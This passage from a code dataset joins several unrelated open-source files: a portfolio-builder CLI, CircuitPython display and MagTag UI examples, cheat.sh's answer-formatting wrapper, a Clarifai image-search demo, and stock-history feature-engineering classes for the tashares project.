" the `targets/` directory for a file of the form `<targets>.csv`, where"
" `<targets>` is the name provided."
),
)
@click.option(
"-a",
"--account",
type=click.Path(exists=True),
help=(
"Path to account data file. Account data is only used when rebalancing a"
" portfolio. If none is provided, the portfolio builder searches the"
" 'accounts/' directory for .csv files containing account data."
),
)
@click.option(
"-c",
"--cash",
type=float,
prompt="Enter your cash available to invest (CAD)",
help="Cash available to invest (CAD).",
)
@click.option(
"-f",
"--fractions",
is_flag=True,
default=False,
help=(
"Allow fractions when computing number of shares to buy/sell. Normally these"
" numbers are required to be whole numbers."
),
)
@click.option(
"--rebalance",
is_flag=True,
default=False,
help=(
"Rebalance an existing portfolio. Place accounts in your portfolio in the"
" 'accounts/' directory."
),
)
@click.option(
"-v",
"--verbose",
count=True,
help="Be verbose. Multiple -v options increase the verbosity.",
)
def main(risk_level, targets, account, cash, fractions, rebalance, verbose):
"""A simple tool to build an ETF-based portfolio with a mix of bonds and equities
depending on your preferred risk level and available cash.
"""
try:
mode = Mode.rebalance if rebalance else Mode.build
portfolio = Portfolio(
risk_level, targets, account, cash, fractions, mode, verbose
)
portfolio.build()
portfolio.print_portfolio()
except KeyboardInterrupt:
return 1
except PortfolioException as err:
echo_error(err)
except Exception as err:
echo_fatal(f"an unknown exception occurred: {err}")
raise
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "joeycastillo/babel",
"score": 3
} |
#### File: CircuitPython/display_bidi_text/bidi_label.py
```python
import displayio
from adafruit_display_text import label
class BidiLabel(label.Label):
def _update_text(self, new_text): # pylint: disable=too-many-locals
x = 0
y = 0
i = 0
direction = 1
old_c = 0
y_offset = int((self.font.get_glyph(ord('M')).height -
new_text.count('\n') * self.height * self.line_spacing) / 2)
#print("y offset from baseline", y_offset)
top = bottom = left = right = 0
for character in new_text:
if character == '\n':
y += int(self.height * self._line_spacing)
x = 0
continue
glyph = self.font.get_glyph(ord(character))
if not glyph:
continue
if direction == -1 and glyph.mirrored:
glyph = self.font.get_glyph(glyph.mirrored)
if glyph.rtl and direction == 1:
if x != 0:
y += int(self.height * self._line_spacing)
x = 0
direction = -1
elif glyph.ltr and direction == -1:
if x != 0:
y += int(self.height * self._line_spacing)
x = 0
direction = 1
right = max(right, x+glyph.width*direction)
if y == 0: # first line, find the Ascender height
top = min(top, -glyph.height+y_offset)
bottom = max(bottom, y-glyph.dy+y_offset)
position_y = y - glyph.height - glyph.dy + y_offset
position_x = x + glyph.dx * direction
if not self._text or old_c >= len(self._text) or character != self._text[old_c]:
try:
face = displayio.TileGrid(glyph.bitmap, pixel_shader=self.palette,
default_tile=glyph.tile_index,
tile_width=glyph.width, tile_height=glyph.height,
position=(position_x, position_y))
except TypeError:
face = displayio.TileGrid(glyph.bitmap, pixel_shader=self.palette,
default_tile=glyph.tile_index,
tile_width=glyph.width, tile_height=glyph.height,
x=position_x, y=position_y)
if i < len(self):
self[i] = face
else:
self.append(face)
elif self._text and character == self._text[old_c]:
try:
self[i].position = (position_x, position_y)
except AttributeError:
self[i].x = position_x
self[i].y = position_y
x += glyph.shift_x * direction
# TODO skip this for control sequences or non-printables.
i += 1
old_c += 1
            # skip all non-printables in the old string
while (self._text and old_c < len(self._text) and
(self._text[old_c] == '\n' or not self.font.get_glyph(ord(self._text[old_c])))):
old_c += 1
# Remove the rest
while len(self) > i:
self.pop()
self._text = new_text
self._boundingbox = (left, top, left+right, bottom-top)
``` |
{
"source": "joeycastillo/circuitpyui",
"score": 3
} |
#### File: examples/MagTag/minimal.py
```python
import time
import board
import neopixel_write
import digitalio
import displayio
import terminalio
from digitalio import DigitalInOut, Pull
import circuitpyui
from circuitpyui import Event
from circuitpyui.common_tasks import ButtonInput, SleepTask, EPDRefreshTask
display = board.DISPLAY
font = terminalio.FONT
colors = [[255, 255, 255],
[0, 255, 0],
[255, 255, 0],
[255, 0, 0],
[255, 0, 255],
[0, 0, 255],
[0, 255, 255]]
class MyApplication(circuitpyui.Application):
"""This is a very basic application with two buttons: one to toggle the Neopixels, another to change their color.
It demonstrates creating and adding circuitpyui views, adding callbacks, and the basics of focus in button-based UI.
This MagTag version also demonstrates creating a ButtonInput task with buttons connected directly to GPIO pins, and
the use of an EPDRefreshTask to automatically update an e-paper display when the UI requires an update.
"""
def __init__(self, window):
# always call super.init to set the window
super().__init__(window)
# color index and light status are internal state; they get encapsulated with the Application
self.color_index = 0
self.light_is_on = False
self.light_pin = digitalio.DigitalInOut(board.NEOPIXEL)
self.light_pin.direction = digitalio.Direction.OUTPUT
# MagTag can shut down power to the Neopixels when not in use. Set high at first to keep them powered down.
self.power_pin = DigitalInOut(board.NEOPIXEL_POWER)
self.power_pin.switch_to_output()
self.power_pin.value = True
# next we create our first button and add it as a subview.
self.toggle_button = circuitpyui.Button(x=16, y=16, width=display.width - 32, height=(display.height - 32) // 3, text="Toggle Neopixels")
self.window.add_subview(self.toggle_button)
# since we have no touchscreen, the user will select an active element using the directional pad.
# we need to set one of the views to be active in order to highlight it and create a start point for navigation.
self.toggle_button.become_active()
# this line attaches an action to the button. When the button receives an Event.TAPPED event, turn_light_on will be called.
self.toggle_button.set_action(MyApplication.turn_light_on, Event.TAPPED)
# creating the second button is similar to the first, but we won't tell it to become active.
self.color_button = circuitpyui.Button(x=16, y=16+ 2 * (display.height - 32) // 3, width=display.width - 32, height=(display.height - 32) // 3, text="Change Color")
self.window.add_subview(self.color_button)
self.color_button.set_action(MyApplication.color_cycle, Event.TAPPED)
# we need to tell the window which button should receive focus when an arrow button is pressed
# this interface is simple: when the top button is active and we press 'down', select the bottom button.
self.window.set_focus_targets(self.toggle_button, down=self.color_button)
# and vice versa when the bottom button is selected and we press 'up'. all other directions will leave the selection alone.
self.window.set_focus_targets(self.color_button, up=self.toggle_button)
# Set up the (physical) buttons!
left_button = DigitalInOut(board.BUTTON_A)
left_button.switch_to_input(Pull.UP)
up_button = DigitalInOut(board.BUTTON_B)
up_button.switch_to_input(Pull.UP)
down_button = DigitalInOut(board.BUTTON_C)
down_button.switch_to_input(Pull.UP)
right_button = DigitalInOut(board.BUTTON_D)
right_button.switch_to_input(Pull.UP)
# MagTag's four buttons could be used as a D-pad, but we need a select button, so this setup only allows up and down motion.
# Right acts like PyGamer's A button, which in circuitpyui taps an element. Left acts like PyGamer's B button.
self.add_task(ButtonInput([(up_button, False, Event.BUTTON_UP),
(down_button, False, Event.BUTTON_DOWN),
(left_button, False, Event.BUTTON_B),
(right_button, False, Event.BUTTON_A)]))
# EPD Refresh Task will update the screen as needed
self.add_task(EPDRefreshTask(display))
# and sleep task will keep us from repeatedly calling the same callback when the button is pressed.
self.add_task(SleepTask(0.1))
# finally, this is a displayio call! showing the window shows the whole view hierarchy that we have set up
display.show(window)
def turn_light_on(self, event):
self.light_is_on = True
self.update_lights()
self.toggle_button.set_action(MyApplication.turn_light_off, Event.TAPPED)
def turn_light_off(self, event):
self.light_is_on = False
self.update_lights()
self.toggle_button.set_action(MyApplication.turn_light_on, Event.TAPPED)
def color_cycle(self, event):
self.color_index = (self.color_index + 1) % len(colors)
self.update_lights()
def update_lights(self):
if self.light_is_on:
# power Neopixels up
self.power_pin.value = False
# write the current color
neopixel_write.neopixel_write(self.light_pin, bytearray(colors[self.color_index] * 4))
else:
# power Neopixels down
self.power_pin.value = True
# style defaults to white on black for normal controls, with black on white (inverse) for active controls
# we still need to specify a style, as any text labels will expect a font.
style = circuitpyui.Style(font=font)
# create our window. This is the only displayio object we are going to show(); after this, we manage all
# of our UI by managing the window's subviews.
window = circuitpyui.Window(x=0, y=0, width=display.width, height=display.height, style=style, max_size=2)
# instantiate the application...
app = MyApplication(window)
# ...and run it! this will keep running in a loop indefinitely
app.run()
``` |
{
"source": "joeyciechanowicz/cheat.sh",
"score": 3
} |
#### File: cheat.sh/lib/cheat_wrapper.py
```python
from gevent.monkey import patch_all
from gevent.subprocess import Popen, PIPE
patch_all()
# pylint: disable=wrong-import-position,wrong-import-order
import sys
import os
import re
import colored
from pygments import highlight as pygments_highlight
from pygments.formatters import Terminal256Formatter # pylint: disable=no-name-in-module
MYDIR = os.path.abspath(os.path.join(__file__, '..', '..'))
sys.path.append("%s/lib/" % MYDIR)
from globals import error, ANSI2HTML, COLOR_STYLES
from buttons import TWITTER_BUTTON, GITHUB_BUTTON, GITHUB_BUTTON_FOOTER
from languages_data import LEXER, LANGUAGE_ALIAS
from get_answer import get_topic_type, get_topics_list, get_answer, find_answer_by_keyword
from beautifier import code_blocks
# import beautifier
# pylint: disable=wrong-import-position,wrong-import-order
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
def remove_ansi(sometext):
"""
Remove ANSI sequences from `sometext` and convert it into plaintext.
"""
return ANSI_ESCAPE.sub('', sometext)
def html_wrapper(data):
"""
Convert ANSI text `data` to HTML
"""
proc = Popen(
["bash", ANSI2HTML, "--palette=solarized", "--bg=dark"],
stdin=PIPE, stdout=PIPE, stderr=PIPE)
data = data.encode('utf-8')
stdout, stderr = proc.communicate(data)
if proc.returncode != 0:
error(stdout + stderr)
return stdout.decode('utf-8')
def _colorize_internal(topic, answer, html_needed):
def _colorize_line(line):
if line.startswith('T'):
line = colored.fg("grey_62") + line + colored.attr('reset')
line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.fg('grey_35'), line)
return line
line = re.sub(r"\[(F.*?)\]",
colored.bg("black") + colored.fg("cyan") + r"[\1]"+colored.attr('reset'),
line)
line = re.sub(r"\[(g.*?)\]",
colored.bg("dark_gray") \
+ colored.fg("grey_0") \
+ r"[\1]"+colored.attr('reset'),
line)
line = re.sub(r"\{(.*?)\}",
colored.fg("orange_3") + r"\1"+colored.attr('reset'),
line)
line = re.sub(r"<(.*?)>",
colored.fg("cyan") + r"\1"+colored.attr('reset'),
line)
return line
if topic in [':list', ':bash_completion']:
return answer
if topic == ':firstpage-v1':
lines = answer.splitlines()
answer_lines = lines[:9]
answer_lines.append(colored.fg('grey_35')+lines[9]+colored.attr('reset'))
for line in lines[10:]:
answer_lines.append(_colorize_line(line))
if html_needed:
answer_lines = answer_lines[:-2]
answer = "\n".join(answer_lines) + "\n"
return answer
def _colorize_ansi_answer(topic, answer, color_style, # pylint: disable=too-many-arguments
highlight_all=True, highlight_code=False,
unindent_code=False):
color_style = color_style or "native"
lexer_class = LEXER['bash']
if '/' in topic:
section_name = topic.split('/', 1)[0].lower()
section_name = LANGUAGE_ALIAS.get(section_name, section_name)
lexer_class = LEXER.get(section_name, lexer_class)
if section_name == 'php':
answer = "<?\n%s?>\n" % answer
if highlight_all:
highlight = lambda answer: pygments_highlight(
answer, lexer_class(), Terminal256Formatter(style=color_style)).strip('\n')+'\n'
else:
highlight = lambda x: x
if highlight_code:
blocks = code_blocks(answer, wrap_lines=True, unindent_code=(4 if unindent_code else False))
highlighted_blocks = []
for block in blocks:
if block[0] == 1:
this_block = highlight(block[1])
else:
this_block = block[1].strip('\n')+'\n'
highlighted_blocks.append(this_block)
result = "\n".join(highlighted_blocks)
else:
result = highlight(answer).lstrip('\n')
return result
def _github_button(topic_type):
repository = {
"cheat.sheets" : 'chubin/cheat.sheets',
"cheat.sheets dir" : 'chubin/cheat.sheets',
"tldr" : 'tldr-pages/tldr',
"cheat" : 'chrisallenlane/cheat',
"learnxiny" : 'adambard/learnxinyminutes-docs',
"internal" : '',
"search" : '',
"unknown" : '',
}
full_name = repository.get(topic_type, '')
if not full_name:
return ''
short_name = full_name.split('/', 1)[1] # pylint: disable=unused-variable
button = (
"<!-- Place this tag where you want the button to render. -->"
'<a aria-label="Star %(full_name)s on GitHub"'
' data-count-aria-label="# stargazers on GitHub"'
' data-count-api="/repos/%(full_name)s#stargazers_count"'
' data-count-href="/%(full_name)s/stargazers"'
' data-icon="octicon-star"'
' href="https://github.com/%(full_name)s"'
' class="github-button">%(short_name)s</a>'
) % locals()
return button
def _render_html(query, result, editable, repository_button, request_options):
result = result + "\n$"
result = html_wrapper(result)
title = "<title>cheat.sh/%s</title>" % query
# title += ('\n<link rel="stylesheet" href="/files/awesomplete.css" />script'
# ' src="/files/awesomplete.min.js" async></script>')
# submit button: thanks to http://stackoverflow.com/questions/477691/
submit_button = ('<input type="submit" style="position: absolute;'
' left: -9999px; width: 1px; height: 1px;" tabindex="-1" />')
topic_list = ('<datalist id="topics">%s</datalist>'
% ("\n".join("<option value='%s'></option>" % x for x in get_topics_list())))
curl_line = "<span class='pre'>$ curl cheat.sh/</span>"
if query == ':firstpage':
query = ""
form_html = ('<form action="/" method="GET"/>'
'%s%s'
'<input'
' type="text" value="%s" name="topic"'
' list="topics" autofocus autocomplete="off"/>'
'%s'
'</form>') \
% (submit_button, curl_line, query, topic_list)
edit_button = ''
if editable:
# It's possible that topic directory starts with omitted underscore
if '/' in query:
query = '_' + query
edit_page_link = 'https://github.com/chubin/cheat.sheets/edit/master/sheets/' + query
edit_button = (
'<pre style="position:absolute;padding-left:40em;overflow:visible;height:0;">'
'[<a href="%s" style="color:cyan">edit</a>]'
'</pre>') % edit_page_link
result = re.sub("<pre>", edit_button + form_html + "<pre>", result)
result = re.sub("<head>", "<head>" + title, result)
if not request_options.get('quiet'):
result = result.replace('</body>',
TWITTER_BUTTON \
+ GITHUB_BUTTON \
+ repository_button \
+ GITHUB_BUTTON_FOOTER \
+ '</body>')
return result
def _visualize(query, keyword, answers, request_options, html=None): # pylint: disable=too-many-locals
search_mode = bool(keyword)
highlight = not bool(request_options and request_options.get('no-terminal'))
color_style = request_options.get('style', '')
if color_style not in COLOR_STYLES:
color_style = ''
found = True # if the page was found in the database
editable = False # can generated page be edited on github (only cheat.sheets pages can)
result = ""
for topic, answer in answers: # pylint: disable=too-many-nested-blocks
if topic == 'LIMITED':
result += colored.bg('dark_goldenrod') \
+ colored.fg('yellow_1') \
+ ' ' + answer + ' ' \
+ colored.attr('reset') + "\n"
break
topic_type = get_topic_type(topic)
highlight = (highlight
and topic not in [":list", ":bash_completion"]
and topic_type not in ["unknown"]
)
found = found and not topic_type == 'unknown'
editable = editable or topic_type == "cheat.sheets"
if topic_type == "internal" and highlight:
answer = _colorize_internal(topic, answer, html)
else:
answer = _colorize_ansi_answer(
topic, answer, color_style,
highlight_all=highlight,
highlight_code=(topic_type == 'question'
and not request_options.get('add_comments')
and not request_options.get('remove_text')),
unindent_code=request_options.get('unindent_code')
)
if search_mode:
if not highlight:
result += "\n[%s]\n" % topic
else:
result += "\n%s%s %s %s%s\n" % (colored.bg('dark_gray'),
colored.attr("res_underlined"),
topic,
colored.attr("res_underlined"),
colored.attr('reset'))
result += answer
result = result.strip('\n') + "\n"
if search_mode:
editable = False
repository_button = ''
else:
repository_button = _github_button(topic_type)
if html and query:
result = _render_html(
query, result, editable, repository_button, request_options)
return result, found
def _sanitize_query(query):
return re.sub('[<>"]', '', query)
def cheat_wrapper(query, request_options=None, html=False):
"""
Giant megafunction that delivers cheat sheet for `query`.
If `html` is True, the answer is formatted as HTML.
Additional request options specified in `request_options`.
This function is really really bad, and should be rewritten
as soon as possible.
"""
def _strip_hyperlink(query):
return re.sub('(,[0-9]+)+$', '', query)
def _parse_query(query):
topic = query
        keyword = None
        search_options = ""
if '~' in query:
topic = query
pos = topic.index('~')
keyword = topic[pos+1:]
topic = topic[:pos]
if '/' in keyword:
search_options = keyword[::-1]
search_options = search_options[:search_options.index('/')]
keyword = keyword[:-len(search_options)-1]
return topic, keyword, search_options
query = _sanitize_query(query)
# at the moment, we just remove trailing slashes
# so queries python/ and python are equal
query = _strip_hyperlink(query.rstrip('/'))
topic, keyword, search_options = _parse_query(query)
if keyword:
answers = find_answer_by_keyword(
topic, keyword, options=search_options, request_options=request_options)
else:
answers = [(topic, get_answer(topic, keyword, request_options=request_options))]
return _visualize(query, keyword, answers, request_options, html=html)
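# A minimal usage sketch (hedged: the queries are hypothetical and follow the
# topic[~keyword[/options]] syntax handled by _parse_query above):
#
#   answer, found = cheat_wrapper("python/lambda", request_options={}, html=False)
#   answer, found = cheat_wrapper("python/~closure", request_options={}, html=False)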
``` |
{
"source": "joeycmlam/topawards-services",
"score": 2
} |
#### File: topawards-services/src/clarifai_predict_demo.py
```python
from clarifai.rest import ClarifaiApp
from clarifai.rest import Image as ClImage
from googleapiclient.discovery import build
import pprint
import json
from PIL import Image
import urllib.request
import io
import config
import clsMySysImage
from tool_lang import google_translate
def google_search(search_term, api_key, cse_id, start, **kwargs):
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=search_term, cx=cse_id, searchType="image", start=start, **kwargs).execute()
return res
def open_result(url_link):
with urllib.request.urlopen(url_link) as url:
f = io.BytesIO(url.read())
img = Image.open(f)
img.show()
def valid_result(url, outputs, rating, search_item):
try:
isShow = False
for output in outputs:
#if output['value'] >= rating and output['name'] in search_item:
if output['value'] >= rating:
print ('show result: {0} - {1:10.5f} {2}'.format(output['name'], output['value'], url))
isShow = True
break
if isShow:
#record = clsImage(url, outputs)
open_result(url)
else:
pprint.pprint(outputs)
except Exception as e:
pprint.pprint(e)
pprint.pprint(outputs)
def predict_by_url(url_link, model):
try:
response = model.predict([ClImage(url=url_link)])
return response['outputs'][0]['data']['concepts']
except Exception as e:
print('skip: {0}'.format(url_link))
def predict_by_localfile(file, model):
response = model.predict([ClImage(file_obj=open(file, 'rb'))])
return response['outputs'][0]['data']['concepts']
def process_result(search_item, results, model, selfConfig):
idx = 0
for result in results:
idx += 1
print('link {0}: {1}'.format(idx, result['link']))
outputs = predict_by_url(result['link'], model)
valid_result(url=result['link'], outputs=outputs, rating=selfConfig['MIN_RATING'], search_item=search_item)
def predictImage(selfConfig, search_item):
start_posn = 1
max_posn = selfConfig['MAX_SEARCH']
while start_posn >= 1 and start_posn < max_posn:
print ('print start: {0}'.format(start_posn))
results = google_search(search_item, selfConfig['DEFAULT']['GOOGLE_API_KEY'], selfConfig['DEFAULT']['GOOGLE_CSE_ID'], start_posn)
process_result(search_item, results['items'], theModel, selfConfig)
start_posn = results['queries']['nextPage'][0]['startIndex']
if __name__ == "__main__":
print ('First Clarifai Image Analysis...')
theConfig = config.getConfig('../resource/config-prd.json')
src_lang='en'
#dest_lang=['ja', 'ko', 'id', 'zh-tw']
dest_lang=['ja', 'ko','id', 'vi', 'th', 'fil']
search_item = input('Please input the search key: ')
app = ClarifaiApp(api_key=theConfig['DEFAULT']['CLARIFAI_API_KEY'])
theModel = app.models.get('myModel')
# theModel = app.models.get('general-v1.3')
for dest in dest_lang:
translate_result = google_translate(input_key=search_item, src_lang=src_lang, dest_lang=dest)
print('{0}: {1}'.format(dest, translate_result.text))
predictImage(theConfig, translate_result.text)
print ('Completed!')
```
#### File: topawards-services/src/config.py
```python
import json
import pprint
def getConfig(file):
with open(file, 'r') as f:
config = json.load(f)
return config
if __name__ == "__main__":
config = getConfig('../resource/config-prd.json')
pprint.pprint(config)
```
#### File: topawards-services/src/main.py
```python
import tkinter as tk
import clarifai_predict as engine
import config
from PIL import ImageTk, Image
import urllib.request
import io
from clsMySysImage import mysysImages
import json
def search_images():
print("Search Item: %s." % (e1.get()))
process_search_image(1)
print('Completed!')
def process_search_image(posn):
theConfig = config.getConfig('../resource/config-prd.json')
results = engine.predictImage(theConfig, e1.get(), posn)
json_msg = json.loads(results)
show_result(json_msg)
def show_result(results):
for record in results:
try:
engine.open_result(record)
except Exception as err:
print("show_result: {0}".format(err))
def change_start_posn(root):
# Apparently a common hack to get the window size. Temporarily hide the
# window to avoid update_idletasks() drawing the window in the wrong
# position.
root.withdraw()
root.update_idletasks() # Update "requested size" from geometry manager
x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2
y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2
root.geometry("+%d+%d" % (x, y))
# This seems to draw the window frame immediately, so only call deiconify()
# after setting correct window position
root.deiconify()
def process_next_page():
pos = res.get_next_page()
print('next result: {0}'.format(pos))
process_search_image(pos)
print('Completed!')
if __name__ == "__main__":
res = mysysImages()
master = tk.Tk()
font_size = ('Verdana', 20)
tk.Label(master, text="Search: ", font=font_size).grid(row=0)
e1 = tk.Entry(master, font=font_size)
e1.grid(row=0, column=1)
tk.Button(master, text='Quit', command=master.quit, font=font_size).grid(row=3, column=0, pady=4)
tk.Button(master, text='Run', command=search_images, fg="Blue",font=font_size).grid(row=3, column=1, pady=4)
tk.Button(master, text='Next', command=process_next_page, fg="Blue",font=font_size).grid(row=3, column=2, pady=4)
change_start_posn(root=master)
tk.mainloop( )
``` |
{
"source": "joeycw/tashares",
"score": 3
} |
#### File: tashares/tashares/stockhist.py
```python
import yfinance as yf
import pandas as pd
from datetime import datetime
from pathlib import Path
import logging
from tashares.cfg import config
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockhist(object):
"""wrap yfinance to download stock history.
- Input: stock symbol.
- Output: save stock price daily history into a file.
there are two modes:
1. load from the local file of stock history (by default)
2. update from internet server: download from yahoo! up to today, and upon request save history
Args:
symbol (string, required): stock symbol. Default: ''
data_dir (string, optional): the directory of data files. Default: CWD, Currunt Working Directory
update_history (bool, optional): download history and info if 'update_history=True'. Default: False, load local files only
start_from_date (string, optional): the date to start downloading stock history. Default. '2015-01-01'
dump_files (bool, optional): save updated history and info into files if 'dump_files=True'. Default: False, don't write files
Examples:
>>> from tashares import Stockhist
>>> msft = Stockhist("MSFT")
>>> msft = Stockhist(symbol="MSFT")
>>> msft = Stockhist("MSFT", update_history=True)
>>> msft = Stockhist("MSFT", data_dir='/tmp')
>>> msft = Stockhist("MSFT", update_history=True, start_from_date='2020-01-01')
"""
start_from_date = config['DEFAULT']['StartFromDate']
historyfolder = config['DEFAULT']['HistoryFolder']
history = pd.DataFrame()
history_start_date: datetime
history_stop_date: datetime
def __init__(self, *args, **kwargs):
self.symbol = kwargs.get('symbol', '') if len(args) == 0 else args[0]
self.ticker = yf.Ticker(self.symbol)
self.data_dir = kwargs.get('data_dir', '')
if kwargs.get('update_history', False):
self.start_from_date = kwargs.get('start_from_date', self.start_from_date)
self.update_history(start_from_date=self.start_from_date)
else:
if self.data_dir.is_dir():
self.history = self.load_history(self.history_filename)
else:
logging.critical(f"{self.data_dir} is not a directory")
if kwargs.get('dump_files', False):
self.dump_history_file(self.history_filename)
def load_history(self, filename) -> pd.DataFrame:
try:
content = pd.read_csv(filename, sep='\t', parse_dates=True, index_col=[0])
assert not content.empty
# sort by date in case that is not ordered
content = content.sort_index()
self.history_start_date = content.index.min()
self.history_stop_date = content.index.max()
assert datetime.now() >= self.history_start_date
logging.debug(
f" {self.symbol} : loaded {len(content)} lines in {filename} from {self.history_start_date} to {self.history_stop_date}")
except:
logging.debug(f" history file '{filename}' nonexistent or broken")
content = pd.DataFrame()
finally:
return content
def update_history(self, start_from_date='2015-01-01', stop_at_date='') -> None:
if bool(self.ticker):
assert self.ticker.ticker == self.symbol
try:
content = self.ticker.history(
start=self.history.index.max() if (not self.history.empty) else datetime.strptime(start_from_date, '%Y-%m-%d'),
end=datetime.today() if stop_at_date == '' else datetime.strptime(stop_at_date, '%Y-%m-%d'),
auto_adjust=False, back_adjust=False, rounding=True)
if not content.empty:
content = content[pd.notnull(content.index.values)]
# merge with history loaded from file
#self.history = self.history.append(content)
self.history = pd.concat([self.history, content])
self.history = self.history[~self.history.index.duplicated(keep='last')]
self.history = self.history.sort_index()
self.history_start_date = self.history.index.min()
self.history_stop_date = self.history.index.max()
logging.debug(
f" {self.symbol} : downloaded history {len(self.history)} days, from {self.history_start_date} to {self.history_stop_date}")
except:
logging.critical(f"{self.symbol}: fail to download history")
def dump_history_file(self, filename) -> None:
if not self.history.empty and filename.parent.is_dir():
self.history.to_csv(filename, sep='\t',
encoding='utf-8', index=True, float_format='%.5f')
logging.info(f" {self.symbol} : write {len(self.history)} lines to {filename}")
@property
def history_filename(self):
return self.data_dir / f"{self.historyfolder}/{self.symbol}"
@property
def symbol(self):
return self._symbol
@symbol.setter
def symbol(self, value: str):
if value == '':
logging.warning(
f"__init__() missing 1 required positional argument: 'symbol', e.g. Stock('MSFT') or Stock(symbol='MSFT')...")
self._symbol = value
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, value: str):
if not Path(value).is_dir():
logging.warning(f"data directory {value} does not exist")
self._data_dir = Path(value)
def __str__(self):
return f"{str(self.__class__)} : {self.symbol} : history {len(self.history)} days, {len(self.history.columns)} columns"
def __len__(self):
return len(self.history)
def __call__(self, *args, **kwargs):
self.update_history()
```
#### File: tashares/tashares/stockjob.py
```python
import pandas as pd
from datetime import datetime
import logging
import numpy as np
from tashares.cfg import config
from tashares.stockmeta import Stockmeta
rng = np.random.default_rng(seed=0)
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockjob(Stockmeta):
"""Generate ML features
Args:
symbol (string, required): stock symbol. Default: ''
forecast_days (int, optional): forecast which day in future. Default: 1, i.e. tomorrow
max_training_date (string, optional): the stopping date for training, to control training/test split. Default: '2021-01-01'
stack (int, optional): stacking features of multiple days. Default: 1, i.e. today's feature only
"""
stack: int = config.getint('DEFAULT', 'FeatureStacks')
forecast_jobs = config['DEFAULT']['ForecastJobs']
max_training_date = config['DEFAULT']['MaxTrainingDate']
features = pd.DataFrame()
max_shift = 0
def __init__(self, *args, **kwargs):
super(Stockjob, self).__init__(*args, **kwargs)
self.max_training_date = datetime.strptime(
kwargs.get('max_training_date', self.max_training_date), '%Y-%m-%d')
self.stack = kwargs.get('stack_features', self.stack)
self.update_features()
def update_features(self):
self.features = self.ta # reference only
if self.features.empty:
return
# stacking
original = self.ta[['open', 'high', 'low', 'close', 'volume']]
for stack in range(1, self.stack+1):
content = original.shift(stack)
content.columns = [
str(col) + f'_{stack}' for col in original.columns]
self.features = pd.concat([self.features, content], axis=1)
self._add_target()
self._add_meta()
logging.debug(f" {self.ticker.ticker} : {len(self.features.columns)} features")
def _add_target(self):
'''handcrafted a set of targets
'''
if self.features.empty:
return
for job in self.forecast_jobs.split(','):
forecast_days = int(job)
assert forecast_days > 0
if forecast_days > self.max_shift:
self.max_shift = forecast_days
target = (self.features['adj close'].shift(-forecast_days) -
self.features['adj close']) / self.features['adj close'] * 100.0
self.features = pd.concat(
[self.features, target.to_frame().rename(columns={'adj close': f"target_{forecast_days}"})], axis=1)
def _add_meta(self):
if self.features.empty:
return
# add symbol
if 'symbol' not in self.features.columns:
self.features.insert(0, 'symbol', self.ticker.ticker)
for key in ['shortName', 'sector', 'industry']:
if key.lower() not in self.features.columns:
if key in self.info:
result = self.info[key]
if not result:
result = 'unknown'
else:
result = 'unknown'
self.features.insert(len(self.features.columns), key.lower(),
result.replace(' ', '_').lower())
# add queryid
self.features['tag'] = np.random.randint(0, 1000, len(self.features))
self.features['queryid'] = self.features['date'].dt.strftime(
'%Y-%m-%d---') + self.features['sector'].apply(str)
def split_jobs(self, forecast_only=False) -> dict:
if self.features.empty:
if forecast_only:
return {'forecasting': pd.DataFrame()}
else:
return {'training': pd.DataFrame(), 'test': pd.DataFrame(), 'forecasting': pd.DataFrame()}
        # drop the first 90 (+ max_shift) rows as a burn-in period
self.features.drop(self.features.head(
90+self.max_shift).index, inplace=True)
self.features.reset_index(drop=True, inplace=True)
        # keep the most recent row for forecasting, then drop the last max_shift rows (their targets are undefined)
forecast = self.features.tail(1)
forecast = forecast[(forecast['date'] > self.max_training_date)]
self.features.drop(self.features.tail(
self.max_shift).index, inplace=True)
has_NaN = self.features.isnull().sum().sum()
assert has_NaN == 0, f"{self.ticker} got {has_NaN} NaN problems!"
# split by 'max_training_date', print out training/test length
forecast = forecast[(forecast['date'] > self.max_training_date)]
test = self.features[(self.features['date'] > self.max_training_date)]
training = self.features[(
self.features['date'] <= self.max_training_date)]
if test.empty and forecast.empty:
logging.warning(f"{self.ticker.ticker}: no longer on listing, skip")
if not training.empty:
training.drop(training.index, inplace=True)
else:
logging.debug(
f" {self.ticker.ticker} : {len(training)} for training, {len(test)} in test, forecasting {len(forecast)}, with columns {len(self.features.columns)}")
if forecast_only:
return {'forecasting': forecast}
else:
return {'training': training, 'test': test, 'forecasting': forecast}
def __len__(self):
return len(self.features)
def __str__(self):
return '\n'.join([super(Stockjob, self).__str__(),
f"{str(self.__class__)} : {self.symbol} : {len(self.features)} samples, {len(self.features.columns)} features"])
def __call__(self, *args, **kwargs):
super(Stockjob, self).__call__(*args, **kwargs)
self.update_features()
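# A minimal usage sketch (hedged: the symbol and data directory are placeholders, and
# update_history=True downloads history and company info over the network).
def _example_stockjob_split():
    job = Stockjob(symbol="MSFT", data_dir=".", update_history=True, stack_features=2)
    splits = job.split_jobs(forecast_only=False)   # keys: 'training', 'test', 'forecasting'
    return {name: len(frame) for name, frame in splits.items()}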
```
#### File: tashares/tashares/stockmeta.py
```python
import json
import logging
from tashares.cfg import config
from tashares.stockta import Stockta
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockmeta(Stockta):
"""load/update stock info, include company name, sector, industry ...
"""
infofolder = config['DEFAULT']['InfoFolder']
def __init__(self, *args, **kwargs):
super(Stockmeta, self).__init__(*args, **kwargs)
if self.data_dir.is_dir():
self.info = self.load(self.info_filename)
if kwargs.get('update_history', False):
self.update()
if kwargs.get('dump_files', False):
self.dump_info_file(self.info_filename)
def load(self, info_filename) -> dict:
info = {}
try:
with open(info_filename) as d:
info = json.load(d)
logging.debug(
f" {self.ticker.ticker} : loaded {len(info)} pairs from {info_filename}")
except:
logging.debug(f" info file '{info_filename}' nonexistent or broken")
finally:
return info
def update(self) -> None:
if bool(self.ticker):
